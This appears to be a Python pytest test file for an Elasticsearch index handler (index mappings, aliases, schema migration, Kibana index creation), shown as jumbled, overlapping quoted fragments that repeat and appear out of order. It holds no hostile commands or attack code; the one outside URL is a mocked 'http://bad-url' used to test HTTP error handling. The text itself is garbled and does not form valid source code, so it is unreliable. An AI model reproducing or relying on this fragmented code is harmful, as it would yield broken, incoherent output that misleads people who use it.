information", "None) @pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name = 'Person' es_options =", "import NotFoundError from aet.logger import get_logger from app import index_handler", "index) == auto_ts) @pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema): res = index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type',", "'test-tenant', alias) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\":", "Version 2.0 (the 'License'); # you may not use this", "the License. import json import pytest import requests import responses", "* # noqa # fixtures LOG = get_logger('TEST-IDX') # convenience", "'Person' es_options = SubscriptionDefinition.get('es_options') geo_name = es_options.get('geo_point_name') auto_ts = es_options.get('auto_timestamp')", "may not use this file except in compliance with #", "id=doc_id, body=doc ) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\": {\"term\":", "(C) 2019 by eHealth Africa : http://www.eHealthAfrica.org # # See", "test___format_lookups(ComplexSchema): formatted = index_handler._format_lookups(ComplexSchema) assert( json.dumps( formatted.get( 'operational_status'), sort_keys=True) ==", "an # \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF", "assert( json.dumps(res, sort_keys=True) == json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def", "es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}} })", "from elasticsearch.exceptions import NotFoundError from aet.logger import get_logger from app", "WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express", "1.0) # find imperfect by string res = es.search(index=index_name, body={", "with this work for additional information # regarding copyright ownership.", "not None) assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts)", "def test__handle_http(): responses.add( responses.GET, 'http://bad-url', json={'error': 'not found'}, status=404 )", "# the License. You may obtain a copy of the", "doc_id, 'poly': '1001' } index_a = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant',", "geo_name, auto_ts, ComplexSchema) index = index.get('mappings', None) assert(len(index) == 1)", "formatted = index_handler._format_lookups(ComplexSchema) assert( json.dumps( formatted.get( 'operational_status'), sort_keys=True) == json.dumps(", "'1001' } index_a = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaA )", "distributed under the License is distributed on an # \"AS", "# find imperfect by string # migrate to schema B", "{\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') < 1.0) # find imperfect", "# software distributed under the License is distributed on an", "= 'dev' name = 'a-topic' alias = es_options.get('alias_name') index =", "you may not use this file except in compliance with", "index.get('mappings', None) assert(len(index) == 1) assert(first('$._doc', index) is not None)", "namespace = 'A_Gather_Form_V1' res = index_handler.get_alias_from_namespace(namespace) assert(res == 'A_Gather_Form') @pytest.mark.integration", "with mapping es = TestElasticsearch.get_session() doc_id = 'poly-test-doc' doc =", "the License. You may obtain a copy of the License", "function for jsonpath @responses.activate @pytest.mark.unit def test__handle_http(): responses.add( responses.GET, 'http://bad-url',", "res = index_handler.get_alias_from_namespace(namespace) assert(res == 'A_Gather_Form') @pytest.mark.integration def test__update_es_index(TestElasticsearch, PolySchemaA,", "SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status')", "'date') assert(first('$.geometry.type', res) == 'object') assert(first('$.meta.type', res) == 'object') assert(first('$.mandatory_date.type',", "def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB): # register index with mapping es", "json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def test___format_single_lookup(ComplexSchema): matching =", "assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts) @pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema): res = index_handler.get_es_types_from_schema(ComplexSchema)", "== 1.0) # find by string res = es.search(index=index_name, body={", "= index.get('mappings', None) assert(len(index) == 1) assert(first('$._doc', index) is not", "distributed on an # \"AS IS\" BASIS, WITHOUT WARRANTIES OR", "= index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes', {}).get('title') == name) @pytest.mark.unit def test___find_timestamp(ComplexSchema):", "or agreed to in writing, # software distributed under the", "jsonpath @responses.activate @pytest.mark.unit def test__handle_http(): responses.add( responses.GET, 'http://bad-url', json={'error': 'not", "mapping es = TestElasticsearch.get_session() doc_id = 'poly-test-doc' doc = {", "'id': doc_id, 'poly': '1001' } index_a = index_handler.get_es_index_from_subscription( es_options={}, name='test1',", "migrate to schema B index_handler.update_es_index(es, index_b, 'test-tenant', alias) es.indices.refresh(index=index_name) res", "sort_keys=True) ) @pytest.mark.unit def test__get_alias_from_namespace(): namespace = 'A_Gather_Form_V1' res =", "{ 'id': doc_id, 'poly': '1001' } index_a = index_handler.get_es_index_from_subscription( es_options={},", "name, tenant, ComplexSchema ) LOG.debug(json.dumps(index, indent=2)) assert(first('$.name', index) == f'{tenant}.{name}')", "= es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') ==", "'operational_status'), sort_keys=True) ) @pytest.mark.unit def test__get_alias_from_namespace(): namespace = 'A_Gather_Form_V1' res", "assert(first('$.optional_dt.format', res) == 'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema):", "License, Version 2.0 (the 'License'); # you may not use", "# find imperfect by string res = es.search(index=index_name, body={ \"query\":", "= index_handler._find_timestamp(ComplexSchema) assert(result == 'timestamp') @pytest.mark.unit def test___format_lookups(ComplexSchema): formatted =", "== 1) assert(first('$._doc', index) is not None) assert(first(f'$._doc.properties.{geo_name}.type', index) ==", "= es_options.get('alias_name') index = index_handler.get_es_index_from_subscription( es_options, name, tenant, ComplexSchema )", "index_handler._format_lookups(ComplexSchema) assert( json.dumps( formatted.get( 'operational_status'), sort_keys=True) == json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'),", "body={ \"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') < 1.0) #", "55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name' res = index_handler.make_kibana_index(name,", "'test-tenant', alias) # put doc es.create( index=index_name, id=doc_id, body=doc )", "ComplexSchema.get_node('MySurvey.operational_status') res = index_handler._format_single_lookup(matching) assert( json.dumps(res, sort_keys=True) == json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'),", "assert(first( f'$.body.mappings._doc.properties.{geo_name}', index) is not None) @pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema):", "es_options.get('alias_name') index = index_handler.get_es_index_from_subscription( es_options, name, tenant, ComplexSchema ) LOG.debug(json.dumps(index,", "not None) @pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name = 'Person' es_options", "assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts) @pytest.mark.unit def", "LOG.debug(json.dumps(index, indent=2)) assert(first('$.name', index) == f'{tenant}.{name}') geo_name = es_options['geo_point_name'] assert(first(", "res = index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes', {}).get('title') == name) @pytest.mark.unit def", "< 1.0) # find imperfect by string # migrate to", "# # See the NOTICE file distributed with this work", "noqa # fixtures LOG = get_logger('TEST-IDX') # convenience function for", "json.dumps(res, sort_keys=True) == json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def test__get_alias_from_namespace():", "= index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type', res) == 'integer') assert(first('$.username.type', res) == 'keyword')", "= 'poly-test-doc' doc = { 'id': doc_id, 'poly': '1001' }", "KIND, either express or implied. See the License for the", "index) is not None) assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index)", "assert(first('$._doc', index) is not None) assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts',", "index) == 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts) @pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema):", "= SubscriptionDefinition.get('es_options') geo_name = es_options.get('geo_point_name') auto_ts = es_options.get('auto_timestamp') index =", "es.create( index=index_name, id=doc_id, body=doc ) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={", "assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string res =", "= es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') <", "or implied. See the License for the # specific language", "express or implied. See the License for the # specific", "= 'A_Gather_Form_V1' res = index_handler.get_alias_from_namespace(namespace) assert(res == 'A_Gather_Form') @pytest.mark.integration def", "@pytest.mark.unit def test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status') res = index_handler._format_single_lookup(matching) assert(", "test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name' res = index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes', {}).get('title')", "assert(result == 'timestamp') @pytest.mark.unit def test___format_lookups(ComplexSchema): formatted = index_handler._format_lookups(ComplexSchema) assert(", "def test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status') res = index_handler._format_single_lookup(matching) assert( json.dumps(res,", "regarding copyright ownership. # # Licensed under the Apache License,", "additional information # regarding copyright ownership. # # Licensed under", "test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options = SubscriptionDefinition.get('es_options') tenant = 'dev' name =", "SubscriptionDefinition.get('es_options') geo_name = es_options.get('geo_point_name') auto_ts = es_options.get('auto_timestamp') index = index_handler.get_index_for_topic(name,", "the # specific language governing permissions and limitations # under", ") LOG.debug(json.dumps(index, indent=2)) assert(first('$.name', index) == f'{tenant}.{name}') geo_name = es_options['geo_point_name']", "f'{tenant}.{name}') geo_name = es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}', index) is not None)", "information # regarding copyright ownership. # # Licensed under the", "may obtain a copy of the License at # #", "auto_ts) @pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema): res = index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type', res) ==", "= SubscriptionDefinition.get('es_options') tenant = 'dev' name = 'a-topic' alias =", "assert(res.get('attributes', {}).get('title') == name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result = index_handler._find_timestamp(ComplexSchema)", "file distributed with this work for additional information # regarding", "import sleep from elasticsearch.exceptions import NotFoundError from aet.logger import get_logger", "name='test1', tenant='test-tenant', schema=PolySchemaA ) index_name = index_a.get('name') index_b = index_handler.get_es_index_from_subscription(", "schema B index_handler.update_es_index(es, index_b, 'test-tenant', alias) es.indices.refresh(index=index_name) res = es.search(index=index_name,", "geo_name = es_options.get('geo_point_name') auto_ts = es_options.get('auto_timestamp') index = index_handler.get_index_for_topic(name, geo_name,", "json import pytest import requests import responses from time import", "index_a, 'test-tenant', alias) # put doc es.create( index=index_name, id=doc_id, body=doc", "@pytest.mark.integration def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB): # register index with mapping", "from aet.logger import get_logger from app import index_handler from .", "name = 'kibana-index-name' res = index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes', {}).get('title') ==", "index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaB ) alias = index_handler.get_alias_from_namespace(PolySchemaA.name) #", "in compliance with # the License. You may obtain a", "fixtures LOG = get_logger('TEST-IDX') # convenience function for jsonpath @responses.activate", "res) == 'date') assert(first('$.optional_dt.type', res) == 'date') assert(first('$.optional_dt.format', res) ==", "law or agreed to in writing, # software distributed under", "index_a.get('name') index_b = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaB ) alias", "responses.GET, 'http://bad-url', json={'error': 'not found'}, status=404 ) res = requests.get('http://bad-url')", "index_handler.update_es_index(es, index_b, 'test-tenant', alias) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\":", "{\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') == 1.0) # find by", "res) == 'object') assert(first('$.meta.type', res) == 'object') assert(first('$.mandatory_date.type', res) ==", "ownership. # # Licensed under the Apache License, Version 2.0", "== 'A_Gather_Form') @pytest.mark.integration def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB): # register index", "index_handler._format_single_lookup(matching) assert( json.dumps(res, sort_keys=True) == json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options = SubscriptionDefinition.get('es_options') tenant", "# # Licensed under the Apache License, Version 2.0 (the", "pytest import requests import responses from time import sleep from", "@pytest.mark.unit def test___find_timestamp(ComplexSchema): result = index_handler._find_timestamp(ComplexSchema) assert(result == 'timestamp') @pytest.mark.unit", "A index_handler.update_es_index(es, index_a, 'test-tenant', alias) # put doc es.create( index=index_name,", "es_options = SubscriptionDefinition.get('es_options') geo_name = es_options.get('geo_point_name') auto_ts = es_options.get('auto_timestamp') index", "find imperfect by string res = es.search(index=index_name, body={ \"query\": {\"term\":", "License for the # specific language governing permissions and limitations", "{\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') < 1.0) # find imperfect", "OR CONDITIONS OF ANY # KIND, either express or implied.", "es_options = SubscriptionDefinition.get('es_options') tenant = 'dev' name = 'a-topic' alias", "test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name = 'Person' es_options = SubscriptionDefinition.get('es_options') geo_name =", "test__get_alias_from_namespace(): namespace = 'A_Gather_Form_V1' res = index_handler.get_alias_from_namespace(namespace) assert(res == 'A_Gather_Form')", "'kibana-index-name' res = index_handler.make_kibana_index(name, AutoGenSchema) assert(res.get('attributes', {}).get('title') == name) @pytest.mark.unit", "under the Apache License, Version 2.0 (the 'License'); # you", "} index_a = index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaA ) index_name", "index_handler.get_es_index_from_subscription( es_options={}, name='test1', tenant='test-tenant', schema=PolySchemaA ) index_name = index_a.get('name') index_b", "body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') < 1.0) #", "'poly-test-doc' doc = { 'id': doc_id, 'poly': '1001' } index_a", "assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string # migrate", "file except in compliance with # the License. You may", "See the NOTICE file distributed with this work for additional", "by string res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}}", "== 'object') assert(first('$.mandatory_date.type', res) == 'date') assert(first('$.mandatory_date.format', res) == 'date')", "index = index_handler.get_es_index_from_subscription( es_options, name, tenant, ComplexSchema ) LOG.debug(json.dumps(index, indent=2))", "this file except in compliance with # the License. You", "'date') assert(first('$.optional_dt.type', res) == 'date') assert(first('$.optional_dt.format', res) == 'epoch_millis') assert(len(list(res.keys()))", "'A_Gather_Form') @pytest.mark.integration def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB): # register index with", "assert(first('$._start.type', res) == 'date') assert(first('$.geometry.type', res) == 'object') assert(first('$.meta.type', res)", "es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}', index) is not None) @pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition,", "in writing, # software distributed under the License is distributed", "res) == 'keyword') assert(first('$._start.type', res) == 'date') assert(first('$.geometry.type', res) ==", "res) == 'date') assert(first('$.geometry.type', res) == 'object') assert(first('$.meta.type', res) ==", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type', res) == 'integer') assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type',", ") @pytest.mark.unit def test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status') res = index_handler._format_single_lookup(matching)", "License is distributed on an # \"AS IS\" BASIS, WITHOUT", "alias = es_options.get('alias_name') index = index_handler.get_es_index_from_subscription( es_options, name, tenant, ComplexSchema", "test__handle_http(): responses.add( responses.GET, 'http://bad-url', json={'error': 'not found'}, status=404 ) res", "assert(first('$.geometry.type', res) == 'object') assert(first('$.meta.type', res) == 'object') assert(first('$.mandatory_date.type', res)", "app import index_handler from . import * # noqa #", "index_handler._find_timestamp(ComplexSchema) assert(result == 'timestamp') @pytest.mark.unit def test___format_lookups(ComplexSchema): formatted = index_handler._format_lookups(ComplexSchema)", "res) == 'date') assert(first('$.optional_dt.format', res) == 'epoch_millis') assert(len(list(res.keys())) == 55)", "= index_handler._format_single_lookup(matching) assert( json.dumps(res, sort_keys=True) == json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) )", "ComplexSchema): es_options = SubscriptionDefinition.get('es_options') tenant = 'dev' name = 'a-topic'", "'date') assert(first('$.mandatory_date.format', res) == 'date') assert(first('$.optional_dt.type', res) == 'date') assert(first('$.optional_dt.format',", "# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY", "== 'date') assert(first('$.optional_dt.format', res) == 'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit", "2019 by eHealth Africa : http://www.eHealthAfrica.org # # See the", "except in compliance with # the License. You may obtain", "imperfect by string res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\":", "'A_Gather_Form_V1' res = index_handler.get_alias_from_namespace(namespace) assert(res == 'A_Gather_Form') @pytest.mark.integration def test__update_es_index(TestElasticsearch,", "= ComplexSchema.get_node('MySurvey.operational_status') res = index_handler._format_single_lookup(matching) assert( json.dumps(res, sort_keys=True) == json.dumps(SAMPLE_FIELD_LOOKUP.get(", "# See the NOTICE file distributed with this work for", "permissions and limitations # under the License. import json import", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "== 55) @pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name' res =", "1.0) # find imperfect by string # migrate to schema", "PolySchemaA, PolySchemaB): # register index with mapping es = TestElasticsearch.get_session()", "put doc es.create( index=index_name, id=doc_id, body=doc ) es.indices.refresh(index=index_name) res =", "res) == 'object') assert(first('$.mandatory_date.type', res) == 'date') assert(first('$.mandatory_date.format', res) ==", "assert(len(index) == 1) assert(first('$._doc', index) is not None) assert(first(f'$._doc.properties.{geo_name}.type', index)", "writing, # software distributed under the License is distributed on", "@pytest.mark.unit def test__handle_http(): responses.add( responses.GET, 'http://bad-url', json={'error': 'not found'}, status=404", "'keyword') assert(first('$._start.type', res) == 'date') assert(first('$.geometry.type', res) == 'object') assert(first('$.meta.type',", "@pytest.mark.unit def test__get_alias_from_namespace(): namespace = 'A_Gather_Form_V1' res = index_handler.get_alias_from_namespace(namespace) assert(res", "# you may not use this file except in compliance", "== name) @pytest.mark.unit def test___find_timestamp(ComplexSchema): result = index_handler._find_timestamp(ComplexSchema) assert(result ==", "assert(first('$.meta.type', res) == 'object') assert(first('$.mandatory_date.type', res) == 'date') assert(first('$.mandatory_date.format', res)", "CONDITIONS OF ANY # KIND, either express or implied. See", "test__get_es_types_from_schema(ComplexSchema): res = index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type', res) == 'integer') assert(first('$.username.type', res)", "= es_options.get('geo_point_name') auto_ts = es_options.get('auto_timestamp') index = index_handler.get_index_for_topic(name, geo_name, auto_ts,", "== f'{tenant}.{name}') geo_name = es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}', index) is not", "index with mapping es = TestElasticsearch.get_session() doc_id = 'poly-test-doc' doc", "# find by string res = es.search(index=index_name, body={ \"query\": {\"term\":", "# put doc es.create( index=index_name, id=doc_id, body=doc ) es.indices.refresh(index=index_name) res", "# # Unless required by applicable law or agreed to", "from time import sleep from elasticsearch.exceptions import NotFoundError from aet.logger", "# migrate to schema B index_handler.update_es_index(es, index_b, 'test-tenant', alias) es.indices.refresh(index=index_name)", "{\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0) # find by", "# Licensed under the Apache License, Version 2.0 (the 'License');", "import responses from time import sleep from elasticsearch.exceptions import NotFoundError", "# regarding copyright ownership. # # Licensed under the Apache", "import pytest import requests import responses from time import sleep", "1.0) # find by string res = es.search(index=index_name, body={ \"query\":", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "requests import responses from time import sleep from elasticsearch.exceptions import", "'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts) @pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema): res =", "res = index_handler._format_single_lookup(matching) assert( json.dumps(res, sort_keys=True) == json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True)", "import requests import responses from time import sleep from elasticsearch.exceptions", "is not None) @pytest.mark.unit def test__get_index_for_topic(SubscriptionDefinition, ComplexSchema): name = 'Person'", "<filename>consumer/tests/test__index_handler.py<gh_stars>0 # Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org", "doc_id = 'poly-test-doc' doc = { 'id': doc_id, 'poly': '1001'", "res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score')", "NOTICE file distributed with this work for additional information #", "ComplexSchema) index = index.get('mappings', None) assert(len(index) == 1) assert(first('$._doc', index)", "== 'date') assert(first('$.mandatory_date.format', res) == 'date') assert(first('$.optional_dt.type', res) == 'date')", "= index_handler.get_es_index_from_subscription( es_options, name, tenant, ComplexSchema ) LOG.debug(json.dumps(index, indent=2)) assert(first('$.name',", "tenant, ComplexSchema ) LOG.debug(json.dumps(index, indent=2)) assert(first('$.name', index) == f'{tenant}.{name}') geo_name", "formatted.get( 'operational_status'), sort_keys=True) == json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit", "required by applicable law or agreed to in writing, #", "not use this file except in compliance with # the", "'integer') assert(first('$.username.type', res) == 'keyword') assert(first('$._start.type', res) == 'date') assert(first('$.geometry.type',", "None) assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point') assert(first(f'$._doc._meta.aet_auto_ts', index) == auto_ts) @pytest.mark.unit", "status=404 ) res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit def", "convenience function for jsonpath @responses.activate @pytest.mark.unit def test__handle_http(): responses.add( responses.GET,", "'object') assert(first('$.mandatory_date.type', res) == 'date') assert(first('$.mandatory_date.format', res) == 'date') assert(first('$.optional_dt.type',", "2.0 (the 'License'); # you may not use this file", "License. import json import pytest import requests import responses from", "None) assert(len(index) == 1) assert(first('$._doc', index) is not None) assert(first(f'$._doc.properties.{geo_name}.type',", "def test__get_es_types_from_schema(ComplexSchema): res = index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type', res) == 'integer') assert(first('$.username.type',", "= es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') ==", "'date') assert(first('$.optional_dt.format', res) == 'epoch_millis') assert(len(list(res.keys())) == 55) @pytest.mark.unit def", "the License for the # specific language governing permissions and", "< 1.0) # find imperfect by string res = es.search(index=index_name,", "doc es.create( index=index_name, id=doc_id, body=doc ) es.indices.refresh(index=index_name) res = es.search(index=index_name,", "ANY # KIND, either express or implied. See the License", "the License is distributed on an # \"AS IS\" BASIS,", "'dev' name = 'a-topic' alias = es_options.get('alias_name') index = index_handler.get_es_index_from_subscription(", "= TestElasticsearch.get_session() doc_id = 'poly-test-doc' doc = { 'id': doc_id,", "eHealth Africa : http://www.eHealthAfrica.org # # See the NOTICE file", "== json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def test___format_single_lookup(ComplexSchema): matching", "# noqa # fixtures LOG = get_logger('TEST-IDX') # convenience function", "# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org #", "= es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}', index) is not None) @pytest.mark.unit def", "import index_handler from . import * # noqa # fixtures", "to schema B index_handler.update_es_index(es, index_b, 'test-tenant', alias) es.indices.refresh(index=index_name) res =", "== 'keyword') assert(first('$._start.type', res) == 'date') assert(first('$.geometry.type', res) == 'object')", "assert( json.dumps( formatted.get( 'operational_status'), sort_keys=True) == json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True)", "register index with mapping es = TestElasticsearch.get_session() doc_id = 'poly-test-doc'", "schema=PolySchemaB ) alias = index_handler.get_alias_from_namespace(PolySchemaA.name) # register schema A index_handler.update_es_index(es,", "'timestamp') @pytest.mark.unit def test___format_lookups(ComplexSchema): formatted = index_handler._format_lookups(ComplexSchema) assert( json.dumps( formatted.get(", "\"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') == 1.0) # find", "Unless required by applicable law or agreed to in writing,", "sleep from elasticsearch.exceptions import NotFoundError from aet.logger import get_logger from", "the Apache License, Version 2.0 (the 'License'); # you may", "index_handler.get_es_index_from_subscription( es_options, name, tenant, ComplexSchema ) LOG.debug(json.dumps(index, indent=2)) assert(first('$.name', index)", "with pytest.raises(requests.exceptions.HTTPError): index_handler.handle_http(res) @pytest.mark.unit def test__get_es_index_from_autoconfig(SubscriptionDefinition, ComplexSchema): es_options = SubscriptionDefinition.get('es_options')", "agreed to in writing, # software distributed under the License", "@responses.activate @pytest.mark.unit def test__handle_http(): responses.add( responses.GET, 'http://bad-url', json={'error': 'not found'},", "== auto_ts) @pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema): res = index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type', res)", "}) assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string res", "'object') assert(first('$.meta.type', res) == 'object') assert(first('$.mandatory_date.type', res) == 'date') assert(first('$.mandatory_date.format',", ") es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": \"1001\"}}", "{\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') == 1.0) # find by string", "LOG = get_logger('TEST-IDX') # convenience function for jsonpath @responses.activate @pytest.mark.unit", "es_options.get('geo_point_name') auto_ts = es_options.get('auto_timestamp') index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema)", "= index_handler._format_lookups(ComplexSchema) assert( json.dumps( formatted.get( 'operational_status'), sort_keys=True) == json.dumps( SAMPLE_FIELD_LOOKUP.get(", "index_handler.update_es_index(es, index_a, 'test-tenant', alias) # put doc es.create( index=index_name, id=doc_id,", "schema=PolySchemaA ) index_name = index_a.get('name') index_b = index_handler.get_es_index_from_subscription( es_options={}, name='test1',", "Apache License, Version 2.0 (the 'License'); # you may not", "index) == f'{tenant}.{name}') geo_name = es_options['geo_point_name'] assert(first( f'$.body.mappings._doc.properties.{geo_name}', index) is", "with # the License. You may obtain a copy of", "index=index_name, id=doc_id, body=doc ) es.indices.refresh(index=index_name) res = es.search(index=index_name, body={ \"query\":", "responses from time import sleep from elasticsearch.exceptions import NotFoundError from", "@pytest.mark.unit def test__make_kibana_index(AutoGenSchema): name = 'kibana-index-name' res = index_handler.make_kibana_index(name, AutoGenSchema)", "sort_keys=True) == json.dumps(SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def test__get_alias_from_namespace(): namespace", "{\"poly\": \"1001\"}} }) assert(res.get('hits').get('max_score') < 1.0) # find imperfect by", "import json import pytest import requests import responses from time", "sort_keys=True) ) @pytest.mark.unit def test___format_single_lookup(ComplexSchema): matching = ComplexSchema.get_node('MySurvey.operational_status') res =", "on an # \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS", "alias) # put doc es.create( index=index_name, id=doc_id, body=doc ) es.indices.refresh(index=index_name)", "@pytest.mark.unit def test__get_es_types_from_schema(ComplexSchema): res = index_handler.get_es_types_from_schema(ComplexSchema) assert(first('$.beds.type', res) == 'integer')", "http://www.eHealthAfrica.org # # See the NOTICE file distributed with this", "sort_keys=True) == json.dumps( SAMPLE_FIELD_LOOKUP.get( 'operational_status'), sort_keys=True) ) @pytest.mark.unit def test___format_single_lookup(ComplexSchema):", "index_handler.get_alias_from_namespace(namespace) assert(res == 'A_Gather_Form') @pytest.mark.integration def test__update_es_index(TestElasticsearch, PolySchemaA, PolySchemaB): #", "}) assert(res.get('hits').get('max_score') < 1.0) # find imperfect by string #", "auto_ts = es_options.get('auto_timestamp') index = index_handler.get_index_for_topic(name, geo_name, auto_ts, ComplexSchema) index", "import * # noqa # fixtures LOG = get_logger('TEST-IDX') #", "tenant = 'dev' name = 'a-topic' alias = es_options.get('alias_name') index", "1) assert(first('$._doc', index) is not None) assert(first(f'$._doc.properties.{geo_name}.type', index) == 'geo_point')", "es.search(index=index_name, body={ \"query\": {\"term\": {\"poly\": 1001}} }) assert(res.get('hits').get('max_score') == 1.0)", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "'not found'}, status=404 ) res = requests.get('http://bad-url') with pytest.raises(requests.exceptions.HTTPError): 